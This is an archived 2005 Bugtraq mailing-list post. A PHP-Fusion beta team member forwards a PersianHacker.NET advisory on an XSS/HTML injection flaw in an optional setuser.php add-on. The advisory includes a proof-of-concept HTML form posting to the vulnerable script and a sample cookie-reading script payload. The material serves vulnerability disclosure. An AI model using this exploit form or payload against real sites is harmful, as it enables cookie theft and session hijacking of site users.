lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 19 Mar 2005 16:19:48 -0500
From: "Sheldon King" <sheldon@...eblitz.com>
To: <bugtraq@...urityfocus.com>
Subject: Fw: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection    Vulnerability


This is not part of PHP Fusion v5.01

This is an available mod addon supplied by the main developer Digitanium for
an IIS Compatibility.

This setuser.php will not implemented into PHP Fusion until v5.02 and is not
mainstream accross the fusion community. I have notified the main developer
Digitanium.

Sheldon King
PHP Fusion Beta Team


----- Original Message ----- 
From: "PersianHacker Team" <pi3ch@...oo.com>
To: <bugtraq@...urityfocus.com>
Sent: Saturday, March 19, 2005 3:20 AM
Subject: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection 
Vulnerability




[PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability
Date: 2005 March
Bug Number: 10

PHP-Fusion
a light-weight open-source content management system (CMS) written in PHP. 
It utilises a mySQL database to store your site content and includes a 
simple, comprehensive adminstration system. PHP-Fusion includes the most 
common features you would expect to see in many other CMS packages
More info @:
http://php-fusion.co.uk/


Discussion:
--------------------
The software does not properly validate user-supplied input in 
'setuser.php'.

A remote user can access the target user's cookies (including authentication 
cookies),
if any, associated with the site running the PHP-Fusion software, access 
data
recently submitted by the target user via web form to the site, or take 
actions
on the site acting as the target user.


Exploit:
--------------------
<html>

<head>
<title>PHP-Fusion v5.01 Exploit</title>
</head>

<body>

<h1>PHP-Fusion v5.01 Html Injection Exploit</h1>


<form method="POST" action="http://www.example.com/setuser.php">
  <b>XSS in register.php:</b><p>
  Username:
  <input type="text" name="user_name" size="48" value="XSS Injection 
Code"></p>
  <p>
  Password:
  <input type="text" name="user_pass" size="48" value="XSS Injection 
Code"></p>
  <p><input type='checkbox' name='remember_me' value='y'>Remember Me<br><br>
  exmple: &lt;script&gt;document.write(document.cookie)&lt;/script&gt;</p>
  <p>&nbsp;<input type='submit' name='login' value='RUN!' 
class='button'></p>
</form>
<p>&nbsp;</p>
<p align="center"><a 
href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>

</body>

</html>


Solution:
--------------------
No solution was available at the time of this entry.


Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by Pi3cH (pi3ch persianhacker net)
http://www.PersianHacker.NET

Special Thanks: devil_box(for xss article), amectris, herbod.


Help
--------------------
visit: http://www.PersianHacker.NET
or mail me @: pi3ch persianhacker net

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ